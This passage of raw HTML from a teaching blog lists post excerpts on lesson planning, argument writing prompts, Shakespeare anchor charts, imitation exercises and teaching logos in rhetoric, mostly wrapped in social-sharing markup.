href="https://rhetorstoolbox.com/2019/01/12/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-723" class="post-723 post type-post status-publish format-standard hentry category-lesson-planning category-teaching tag-curiosity tag-lesson-planning tag-movement tag-personal-connection tag-teaching no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/" rel="bookmark"><time class="entry-date published" datetime="2018-12-29T07:00:55-06:00">December 29, 2018</time><time class="updated" datetime="2018-12-25T13:03:40-06:00">December 25, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/tag/lesson-planning/" rel="category tag">Lesson Planning</a>, <a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/" rel="bookmark">Three Ways to Jazz Up Your Lesson Plans</a></h2> </header> <div class="entry-content"> <p>Need to add a little interest to your lesson plans? Here are three tried-and true tips for taking it up a notch. Tip #1: Always start with a personal connection. That "hook" or "anticipatory" set part of a lesson plan is incredibly important to getting students ready to learn. In the first five minutes or &hellip; <a href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/" class="more-link">Continue reading <span class="screen-reader-text">Three Ways to Jazz Up Your Lesson Plans</span></a></p><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-723" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-723" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-723" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-723" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-723" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/29/three-ways-to-jazz-up-your-lesson-plans/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-803" class="post-803 post type-post status-publish format-standard hentry category-teaching no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/" rel="bookmark"><time class="entry-date published" datetime="2018-12-22T13:28:00-06:00">December 22, 2018</time><time class="updated" datetime="2019-04-23T20:41:27-06:00">April 23, 2019</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/" rel="bookmark">25 Creative Argument Writing Prompts for Middle and High School Students</a></h2> </header> <div class="entry-content"> <p>  Choose an undesirable or misunderstood animal; create an argument for why this animal would make an excellent pet. Craft an argument for why the person sitting next to you should be honored with a prestigious award. Which is the more powerful word: hello or goodbye? One of these words must be removed from the &hellip; <a href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/" class="more-link">Continue reading <span class="screen-reader-text">25 Creative Argument Writing Prompts for Middle and High School Students</span></a></p><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-803" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-803" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-803" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-803" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-803" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/12/22/25-creative-argument-writing-prompts-for-middle-and-high-school-students/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-815" class="post-815 post type-post status-publish format-standard hentry category-analysis category-anchor-charts category-ap-language-and-composition category-shakespeare category-teaching no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/" rel="bookmark"><time class="entry-date published updated" datetime="2018-11-03T11:13:09-06:00">November 3, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/analysis/" rel="category tag">Analysis</a>, <a href="https://rhetorstoolbox.com/category/anchor-charts/" rel="category tag">Anchor Charts</a>, <a href="https://rhetorstoolbox.com/category/ap-language-and-composition/" rel="category tag">AP Language and Composition</a>, <a href="https://rhetorstoolbox.com/category/shakespeare/" rel="category tag">Shakespeare</a>, <a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/" rel="bookmark">Teaching Shakespeare? You Need These Anchor Charts!</a></h2> </header> <div class="entry-content"> <p>If you have ever taught Shakespeare's plays or sonnets, then you know students can struggle to unlock the language and meaning of the text. The following two anchor charts have been tremendously helpful in giving my students a process to understand the Bard's verse. In my classroom, these two posters sit side-by-side. They are the two &hellip; <a href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/" class="more-link">Continue reading <span class="screen-reader-text">Teaching Shakespeare? You Need These Anchor Charts!</span></a></p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-815" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-815" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-815" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-815" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-815" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/11/03/teaching-shakespeare-you-need-these-anchor-charts/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-807" class="post-807 post type-post status-publish format-standard hentry category-teaching no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/" rel="bookmark"><time class="entry-date published updated" datetime="2018-09-23T09:13:10-06:00">September 23, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/" rel="bookmark">Why You Should Be Using Imitation Exercises to Teach Writing</a></h2> </header> <div class="entry-content"> <p>"You write your first draft with your heart, but you rewrite with your head." From Finding Forrester (2000) https://www.youtube.com/watch?reload=9&amp;v=zLBEFvMkQCo &nbsp; Recall a favorite line from a beloved book. Its resonance and its transcendence recall something of the fragile tenacity of the human spirit--in a smudge of ink on grainy paper.   A writer is a patient &hellip; <a href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/" class="more-link">Continue reading <span class="screen-reader-text">Why You Should Be Using Imitation Exercises to Teach Writing</span></a></p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-807" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-807" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-807" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-807" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-807" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/09/23/why-you-should-be-using-imitation-exercises-to-teach-writing/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-794" class="post-794 post type-post status-publish format-standard hentry category-analysis category-ap-language-and-composition category-essential-tools-series category-ethos-pathos-logos category-rhetoric category-rhetorical-appeals category-teaching category-tools category-writing tag-rhetorical-analysis no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/" rel="bookmark"><time class="entry-date published" datetime="2018-07-07T12:19:43-06:00">July 7, 2018</time><time class="updated" datetime="2018-08-20T18:35:19-06:00">August 20, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/analysis/" rel="category tag">Analysis</a>, <a href="https://rhetorstoolbox.com/category/ap-language-and-composition/" rel="category tag">AP Language and Composition</a>, <a href="https://rhetorstoolbox.com/category/essential-tools-series/" rel="category tag">Essential Tools Series</a>, <a href="https://rhetorstoolbox.com/category/ethos-pathos-logos/" rel="category tag">Ethos, Pathos, Logos</a>, <a href="https://rhetorstoolbox.com/category/rhetoric/" rel="category tag">Rhetoric</a>, <a href="https://rhetorstoolbox.com/category/rhetorical-appeals/" rel="category tag">Rhetorical Appeals</a>, <a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a>, <a href="https://rhetorstoolbox.com/category/tools/" rel="category tag">Tools</a>, <a href="https://rhetorstoolbox.com/category/writing/" rel="category tag">Writing</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/" rel="bookmark">Essential Tools for Teaching Rhetoric: Logos</a></h2> </header> <div class="entry-content"> <p>What are the essential tools for teaching rhetoric and rhetorical analysis? This blog series will explore one tool each week. Logos Logos: it's "the principle of reason and judgment," according to the Oxford English Dictionary. Our current understanding of logos in rhetoric is actually linked with Jungian psychology (the same Jungian psychology that gives us &hellip; <a href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/" class="more-link">Continue reading <span class="screen-reader-text">Essential Tools for Teaching Rhetoric: Logos</span></a></p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-794" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-794" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-794" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-794" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a 